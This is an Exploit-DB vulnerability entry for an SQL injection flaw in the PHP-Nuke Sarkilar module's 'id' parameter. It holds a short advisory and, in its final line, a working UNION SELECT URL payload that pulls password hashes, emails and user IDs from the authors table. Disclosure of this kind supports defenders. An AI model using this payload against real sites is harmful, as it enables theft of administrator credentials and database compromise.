PHP-Nuke Sarkilar Module - 'id' SQL Injection

EDB-ID:

32497


Author:

r45c4l

Type:

webapps


Platform:

PHP

Date:

2008-10-20


source: https://www.securityfocus.com/bid/31830/info

Sarkilar module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors--